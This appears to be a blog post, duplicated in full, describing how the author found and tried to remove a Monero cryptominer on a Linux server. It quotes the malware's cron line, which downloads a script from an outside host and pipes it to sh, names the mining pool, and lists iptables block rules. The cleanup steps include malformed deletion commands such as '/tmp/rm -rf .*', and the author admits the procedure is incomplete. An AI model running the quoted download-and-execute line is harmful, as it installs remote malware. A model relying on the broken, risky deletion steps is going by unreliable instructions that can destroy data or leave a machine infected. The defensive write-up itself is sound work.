Recently I had a requirement to check the performance of a linux server.
A very strange job was starting over and over again no matter the times I killed it. This job was consuming a high percentage of cpu.
After a several commands for checking the origin of this job. I found the following A CryptoMiner malware infected the system.
The malware specializes in Mining relatively new cryptocurrency Monero (XMR). This is not only a new currency with a little difficulty, but the attackers for some reason chose it.
The malware checks the version of the system - and adds the appropriate executable file to AutoRun.
"
More detail here:
https://steemit.com/steemit/@whitemike313/crypto-miner-has-infected-thousands-of-nas-in-the-world
Well the steps I did to get rid of this malware:
1.- Stop all the communication to their servers.
sudo chkconfig iptables on
sudo iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
sudo iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
sudo iptables -A INPUT -s txrdr.com -j DROP
sudo iptables -A OUTPUT -d txrdr.com -j DROP
sudo service iptables save
sudo service iptables status
txrdr.com (this one, I found it in a cron file)
2.- Delete tmp files
/tmp/rm -rf .*
/tmp/rm -rf
3.- Delete oracle cron file
/var/spool/cron/oracle
Or remove its contents
In my case (*/1 * * * * curl txrdr.com/sitecontent/S6-WEB.jpg|sh;)
4.- Restart as many times as you required in order to see the process is not starting
5.- Check if you need to have cron running, otherwise stop it using /etc/init.d/crond stop.
This process is not going to clean completely the system but is going to block all the communications and avoid the cron job regenerates the source of the malware, thus the job is not going to start if the connection is not established succesfully.
Well done bad guys!!
A very strange job was starting over and over again no matter the times I killed it. This job was consuming a high percentage of cpu.
After a several commands for checking the origin of this job. I found the following A CryptoMiner malware infected the system.
The malware specializes in Mining relatively new cryptocurrency Monero (XMR). This is not only a new currency with a little difficulty, but the attackers for some reason chose it.
The malware checks the version of the system - and adds the appropriate executable file to AutoRun.
"
stratum+tcp://monero.crypto-pool.fr:3333"More detail here:
https://steemit.com/steemit/@whitemike313/crypto-miner-has-infected-thousands-of-nas-in-the-world
Well the steps I did to get rid of this malware:
1.- Stop all the communication to their servers.
sudo chkconfig iptables on
sudo iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
sudo iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
sudo iptables -A INPUT -s txrdr.com -j DROP
sudo iptables -A OUTPUT -d txrdr.com -j DROP
sudo service iptables save
sudo service iptables status
txrdr.com (this one, I found it in a cron file)
2.- Delete tmp files
/tmp/rm -rf .*
/tmp/rm -rf
3.- Delete oracle cron file
/var/spool/cron/oracle
Or remove its contents
In my case (*/1 * * * * curl txrdr.com/sitecontent/S6-WEB.jpg|sh;)
4.- Restart as many times as you required in order to see the process is not starting
5.- Check if you need to have cron running, otherwise stop it using /etc/init.d/crond stop.
This process is not going to clean completely the system but is going to block all the communications and avoid the cron job regenerates the source of the malware, thus the job is not going to start if the connection is not established succesfully.
Well done bad guys!!
